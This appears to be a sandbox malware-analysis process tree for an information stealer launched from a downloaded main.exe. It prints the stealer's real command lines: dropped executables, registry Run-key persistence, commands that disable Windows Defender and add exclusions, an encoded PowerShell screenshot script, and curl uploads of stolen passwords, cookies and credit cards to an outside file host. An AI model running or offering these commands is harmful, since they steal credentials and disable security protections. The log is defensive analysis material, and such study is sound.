    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=8500 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6820
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=8456 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6836
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=8768 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6928
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=8512 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6616
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=6932 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6572
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=7112 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:7048
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3984 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:6876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9112 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:8
    3⤵
    PID:7072
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=9176 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:1
    3⤵
    PID:6076
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8656 --field-trial-handle=1928,i,6173313853855274250,3491084170885578888,131072 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7116
- C:\Users\Admin\Downloads\main.exe
  "C:\Users\Admin\Downloads\main.exe"
  2⤵
  PID:2648
- - C:\Users\Admin\Downloads\main.exe
    "C:\Users\Admin\Downloads\main.exe"
    3⤵
    - Loads dropped DLL
    PID:5828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI26482\Build.exe -pbeznogym
      4⤵
      PID:4504
    - - C:\Users\Admin\AppData\Local\Temp\_MEI26482\Build.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI26482\Build.exe -pbeznogym
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:616
      - C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        6⤵
        Executes dropped EXE
        
        PID:5960
        
        C:\ProgramData\Microsoft\hacn.exe
        
        "C:\ProgramData\Microsoft\hacn.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:632
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI59602\s.exe -pbeznogym
        8⤵
        
        PID:6700
        
        C:\Users\Admin\AppData\Local\Temp\_MEI59602\s.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI59602\s.exe -pbeznogym
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:6148
        
        C:\ProgramData\main.exe
        
        "C:\ProgramData\main.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:6772
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp89A4.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp89A4.tmp.bat
        11⤵
        
        PID:8512
        
        C:\Windows\system32\tasklist.exe
        
        Tasklist /fi "PID eq 6772"
        12⤵
        Enumerates processes with tasklist
        
        PID:8640
        
        C:\Windows\system32\find.exe
        
        find ":"
        12⤵
        
        PID:8604
        
        C:\Windows\system32\timeout.exe
        
        Timeout /T 1 /Nobreak
        12⤵
        Delays execution with timeout.exe
        
        PID:6460
        
        C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        
        PID:5680
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        13⤵
        
        PID:10064
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe /f
        14⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:10780
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        10⤵
        Executes dropped EXE
        
        PID:4628
        
        C:\ProgramData\svchost.exe
        
        "C:\ProgramData\svchost.exe"
        11⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5284
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        12⤵
        
        PID:6072
        
        C:\ProgramData\setup.exe
        
        "C:\ProgramData\setup.exe"
        10⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        
        PID:6792
      - C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        6⤵
        Executes dropped EXE
        
        PID:7008
        
        C:\ProgramData\Microsoft\based.exe
        
        "C:\ProgramData\Microsoft\based.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:6820
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
        8⤵
        
        PID:6364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        8⤵
        
        PID:5756
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3880
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        8⤵
        
        PID:5668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        8⤵
        
        PID:5084
        
        C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        9⤵
        Executes dropped EXE
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        10⤵
        Drops startup file
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1948
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
        11⤵
        
        PID:8632
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
        12⤵
        
        PID:8808
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
        11⤵
        
        PID:11908
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
        12⤵
        
        PID:7176
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
        11⤵
        
        PID:7320
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
        12⤵
        
        PID:7404
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
        11⤵
        
        PID:7812
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
        12⤵
        
        PID:7920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
        11⤵
        
        PID:7260
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
        12⤵
        
        PID:5396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
        11⤵
        
        PID:5716
        
        C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
        12⤵
        
        PID:8300
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('GG', 0, 'Critical error', 0+16);close()""
        8⤵
        
        PID:2916
        
        C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('GG', 0, 'Critical error', 0+16);close()"
        9⤵
        
        PID:7024
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎  .scr'"
        8⤵
        
        PID:2744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎  .scr'
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6432
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:3740
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        
        PID:7112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:5076
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        
        PID:3056
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        8⤵
        
        PID:1740
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        9⤵
        
        PID:7016
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        8⤵
        
        PID:6912
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        9⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:7104
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        8⤵
        
        PID:836
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        9⤵
        Enumerates processes with tasklist
        
        PID:5272
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        8⤵
        
        PID:5260
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        9⤵
        
        PID:5460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        8⤵
        
        PID:3452
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        9⤵
        
        PID:5976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        8⤵
        
        PID:5236
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        9⤵
        Gathers system information
        
        PID:5052
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        8⤵
        
        PID:4884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6676
        
